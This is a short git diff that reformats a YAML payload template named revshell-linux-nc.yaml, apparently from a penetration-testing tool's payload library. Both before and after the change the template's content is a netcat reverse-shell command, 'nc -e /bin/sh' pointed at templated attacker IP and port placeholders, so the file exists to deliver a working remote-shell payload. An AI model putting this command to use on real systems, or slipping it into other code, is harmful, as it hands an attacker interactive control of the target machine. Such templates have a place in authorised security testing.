--- a/src/profi/templates/payloads/revshell-linux-nc.yaml
+++ b/src/profi/templates/payloads/revshell-linux-nc.yaml
@@ -1,10 +1,9 @@
+---
 metadata:
-  filename: revshell-linux-nc.yaml
-  tags:
-  - shell
-  - linux
-  created: '2025-03-29'
-  author: Unknown
-content: 'nc -e /bin/sh {{ attacker_ip }} {{ shell_port }}
+  filename: "revshell-linux-nc.yaml"
+  tags: ["shell", "linux"]
+  created: "2025-03-29"
+  author: "Unknown"
 
-  '
+content: |
+  nc -e /bin/sh {{ attacker_ip }} {{ shell_port }}
